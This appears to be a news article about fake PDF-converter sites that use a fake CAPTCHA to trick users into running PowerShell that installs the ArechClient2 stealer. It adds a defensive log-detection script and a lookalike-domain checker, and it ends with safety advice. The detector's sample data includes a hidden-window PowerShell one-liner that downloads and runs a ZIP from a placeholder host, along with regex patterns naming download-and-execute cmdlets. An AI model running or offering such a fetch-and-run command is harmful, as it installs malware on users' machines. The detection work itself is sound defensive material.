- Fake PDF converters deceive users with cloned sites and fake CAPTCHAs
- A PowerShell command installs malware that steals browser and cryptocurrency wallet data
- Attackers use realistic site designs and social engineering to avoid detection
Cybercriminals are using fake PDF converters to install powerful malware on victims' systems, experts have warned.
CloudSEK's research found attackers cloning popular file-conversion websites such as PDFCandy.com, reproducing its logo and branding, to lure users into downloading malware.
CloudSEK says these fake sites look almost identical to the real ones. When someone tries to convert a file, the page shows a fake loading screen, then prompts for a CAPTCHA verification. Instead of simply confirming that the user is human, this step leads to an instruction to run a PowerShell command. Running that command downloads a ZIP file containing malware known as ArechClient2, part of the SectopRAT family of information stealers.
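As an added illustration of what the CAPTCHA-to-PowerShell step looks like from the defender's side (example code written for this page, not CloudSEK's tooling or anything from the article): the script below scans constructed Sysmon-style process-creation records and flags a PowerShell launch whose parent is explorer.exe (the Run box or Start menu a victim pastes into) when it also carries download-and-execute cmdlets or hidden/encoded switches. The field names, the indicator lists, the scoring threshold and the sample records are assumptions for this example; `example.invalid` is a placeholder host.

```python
"""Heuristic detection for the fake-CAPTCHA 'paste this PowerShell command' lure.

Added example; not code from the article or from CloudSEK. Scans process-creation
records with Sysmon Event ID 1 style field names (Image, ParentImage, CommandLine;
an assumption about the log format) and scores each PowerShell launch on three
independent signals. Two or more together are flagged, so a lone admin switch
such as -ExecutionPolicy Bypass in a scheduled script is not.
"""
import re

# Cmdlets and aliases seen in 'fetch a ZIP, unpack it, run it' one-liners.
# Illustrative list, not an exhaustive signature set.
DOWNLOAD_INDICATORS = re.compile(
    r"invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b|downloadstring|downloadfile|"
    r"net\.webclient|start-bitstransfer|expand-archive|invoke-expression|\biex\b",
    re.IGNORECASE,
)
# Switches that hide the window, skip the profile, or carry an encoded payload.
EVASION_INDICATORS = re.compile(
    r"-e(c|nc|ncodedcommand)?\b|-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b|"
    r"-ep\s+bypass|executionpolicy\s+bypass",
    re.IGNORECASE,
)
POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")
# explorer.exe is the parent when a user pastes into Win+R or the Start menu.
SHELL_PARENTS = ("explorer.exe",)


def _basename(path):
    return path.lower().rsplit("\\", 1)[-1]


def score_event(event):
    """Return (score, reasons) for one process-creation record."""
    reasons = []
    if _basename(event.get("Image", "")) not in POWERSHELL_IMAGES:
        return 0, reasons
    cmd = event.get("CommandLine", "")
    if _basename(event.get("ParentImage", "")) in SHELL_PARENTS:
        reasons.append("PowerShell started from explorer.exe (Run box / pasted command)")
    if DOWNLOAD_INDICATORS.search(cmd):
        reasons.append("download-and-execute cmdlet in command line")
    if EVASION_INDICATORS.search(cmd):
        reasons.append("hidden window, no profile, policy bypass or encoded command")
    return len(reasons), reasons


def find_suspicious(events, threshold=2):
    """Return [(event, reasons)] for records scoring at or above threshold."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev, reasons))
    return hits


# Constructed sample records (not real telemetry). The URL host is a placeholder.
SAMPLE_EVENTS = [
    {   # the lure: pasted one-liner that fetches and unpacks a ZIP, then runs it
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r'powershell.exe -w hidden -nop -c "iwr http://example.invalid/convert.zip '
                       r'-OutFile $env:TEMP\c.zip; Expand-Archive $env:TEMP\c.zip '
                       r'-DestinationPath $env:TEMP\c; Start-Process $env:TEMP\c\setup.exe"',
    },
    {   # a routine admin task: one evasion-looking switch, nothing else
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "ParentImage": r"C:\Windows\System32\cmd.exe",
        "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    },
    {   # unrelated process
        "Image": r"C:\Windows\System32\notepad.exe",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CommandLine": r"notepad.exe C:\Users\user\notes.txt",
    },
]

if __name__ == "__main__":
    for ev, reasons in find_suspicious(SAMPLE_EVENTS):
        print("SUSPICIOUS:", ev["CommandLine"])
        for r in reasons:
            print("  -", r)
```

The point of scoring rather than matching a single string is that each signal on its own is common in legitimate administration; it is the combination of a shell-launched PowerShell, a fetch-and-run cmdlet and a hidden or bypassed window that matches the lure the article describes.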
Collection of personal data, and worse
The malware uses several stealth techniques to infect the system. It spawns what look like normal Windows processes to hide its activity and begins collecting browser passwords, cryptocurrency wallet data and other sensitive information. Once active, it can quietly send the stolen data to the attackers, CloudSEK reports.
The FBI has already warned that online file converters are becoming a popular way for criminals to distribute malware. CloudSEK's research shows attackers refining their methods, combining realistic websites with social engineering tricks to lower users' guard.
Because online tools are part of daily work and personal life, it is important to know how to avoid these threats.
How to stay safe
The best way to protect yourself is to avoid clicking on random search results for online file converters. Always go directly to known official websites.
Beyond that, always check the website address for small spelling changes that are easy to miss.
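To make the "small spelling changes" check concrete, here is an added example (written for this page, not part of the original article) that compares a URL's domain against a short list of trusted converters, with pdfcandy.com from the article as the only entry. It goes slightly beyond the advice by also catching homoglyph swaps (c0m for com) and the real brand name buried as a subdomain of an attacker-controlled domain. The trusted list, the homoglyph table, the two-edit threshold and all the sample URLs are assumptions for this example.

```python
"""Lookalike-domain check for the 'small spelling changes' advice above.

Added example, not from the article. Classifies a URL as trusted, a typo
lookalike (within max_edits of a trusted name), a homoglyph lookalike
(equal after swapping confusable characters), a trusted brand embedded as a
subdomain of some other domain, or unrelated.
"""
from urllib.parse import urlsplit

# The one real site named in the article; extend with the converters you use.
TRUSTED = {"pdfcandy.com"}

# Character pairs that look alike in many fonts (assumed table, not exhaustive).
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s")]


def levenshtein(a, b):
    """Edit distance (insert/delete/substitute) between two strings."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable(host):
    """Crude registrable domain: last two labels. Enough for .com-style names
    used here; multi-part suffixes such as .co.uk need a public-suffix list."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def normalize(name):
    """Fold confusable sequences so pdfcandy.c0m compares equal to pdfcandy.com."""
    for src, dst in HOMOGLYPHS:
        name = name.replace(src, dst)
    return name


def classify(url, trusted=TRUSTED, max_edits=2):
    """Return (verdict, matched_domain)."""
    if "://" not in url:
        url = "https://" + url
    host = (urlsplit(url).hostname or "").lower()
    dom = registrable(host)
    if dom in trusted:
        return "trusted", dom
    labels = host.split(".")
    for t in trusted:
        if normalize(dom) == normalize(t):
            return "lookalike-homoglyph", t
        if t.split(".")[0] in labels:
            return "lookalike-embedded", t
        if levenshtein(dom, t) <= max_edits:
            return "lookalike-typo", t
    return "unrelated", dom


# Constructed sample URLs for demonstration.
SAMPLES = [
    "https://pdfcandy.com/convert",
    "https://www.pdfcandy.com/",
    "pdfcandv.com",
    "pdfcandy.c0m",
    "https://pdfcandy.com.download-files.example/",
    "https://example.org/",
]

if __name__ == "__main__":
    for u in SAMPLES:
        print(f"{u:48} -> {classify(u)}")
```

The edit-distance threshold is a trade-off: two edits catches most single-typo and swapped-letter registrations, but on very short trusted names it will also match unrelated domains, so tune `max_edits` per entry or require a minimum name length before applying it.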
For a good starting point, see our overview of the best PDF editors and the best free PDF editors. We also recommend the best Adobe Acrobat alternatives.
Staying cautious when downloading documents online can stop many of these attacks before they start.
Keep your antivirus software up to date (you do that anyway, right?) and scan every downloaded file before opening it. Installing browser extensions that block suspicious or dangerous sites can also help.
If a website asks you to run PowerShell commands or download additional files after you have downloaded a document, close the page immediately. No legitimate CAPTCHA or file converter ever requires you to paste a command into the Run box or a terminal.
Finally, if you think you have been tricked, disconnect the device from the internet immediately, change all important passwords from a separate, trusted device, and notify your bank or service providers as soon as possible.